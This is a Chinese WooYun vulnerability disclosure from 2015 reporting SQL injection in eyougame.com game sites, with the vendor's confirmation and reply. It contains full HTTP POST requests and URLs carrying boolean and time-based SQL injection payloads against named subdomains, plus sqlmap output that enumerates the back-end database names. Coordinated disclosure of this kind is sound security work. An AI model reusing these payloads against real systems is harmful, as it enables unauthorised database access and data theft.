当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123106

漏洞标题:eyougame SQL注入

相关厂商:eyougame.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-29 10:47

修复时间:2015-08-13 11:16

公开时间:2015-08-13 11:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

感觉厂商这区别对待也太伤人了 提交了2个洞 回复也就寥寥几句 别人一个撞库 却回复了那么多···唉

详细说明:

POST数据包:

POST /index.php/Home/Facebooklike/join HTTP/1.1
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://zxx.eyougame.com/
Cookie: PHPSESSID=dgp52huf7u1aiu1nhshuhirf42
Host: zxx.eyougame.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
serverid=8&url=e'%20AND%203*2*1%3d6%20AND%20'000FagC'%3d'000FagC&username=e


保存后 丢进 sqlmap 里

0.png


(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth
ers (if any)? [y/N] n
sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Parameter: #1* ((custom) POST)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: serverid=8&url=e' AND 3);(SELECT * FROM (SELECT(SLEEP(5)))nAuD)#21=
6 AND '000FagC'='000FagC&username=e
---
[15:17:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.11
[15:17:32] [INFO] fetching database names
[15:17:32] [INFO] fetching number of databases
[15:17:32] [INFO] retrieved:


16库

1.png


available databases [16]:
[*] authdata
[*] fzqjdata
[*] information_schema
[*] mysql
[*] nwcs
[*] performance_schema
[*] phpmyadmin
[*] skylight
[*] sydata
[*] themedata
[*] wzzndata
[*] xldata
[*] yxzddata
[*] zhanxian
[*] zwx
[*] zxxdata
[16:01:57] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 59 times
[16:01:57] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\zxx.eyougame.com'
[*] shutting down at 16:01:57
D:\Program Files\sqlmap>


漏洞证明:

再附送几处 SQL 注入 但是没出数据的

http://syzg.eyougame.com/Info/selectMutiList/pid/2%20AND%203*2*1%3d6%20AND%20393%3d393/id/10.html
http://syzg.eyougame.com/Info/showMutiList/id/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/.html
http://zhanxia.eyougame.com/Home/Index/selectMutiList/pid/2%20AND%203*2*1%3d6%20AND%20800%3d800/id/28/p/1.html
http://syzg.eyougame.com/Info/selectMutiList/pid/2%20AND%203*2*1%3d6%20AND%20536%3d536/id/12/p/1.html
http://zhanxia.eyougame.com/Home/Index/showMutiList/id/if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/.html


00.png


POST数据包:

POST /index.php/Home/Facebooklike/join HTTP/1.1
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://syzg.eyougame.com/
Cookie: PHPSESSID=hagmf9qrgkr11qdoj31gt7vvl4
Host: syzg.eyougame.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
serverid=10&url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&username=e

修复方案:

有礼物不?

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-06-29 11:14

厂商回复:

误解了,我尊重并且敬仰着各位在漏洞一线的各位隐士,因为第一个注入漏洞是你发现的,当时忙着去处理漏洞的事了,所以答复真的比较少.抱歉,第二个注入发现的时候心态会好点,发现TP的过滤函数是靠不住的...礼物我很想给的,不过需要找领导申请,因为手上没有财务权,个中心酸就不表述了。

最新状态:

暂无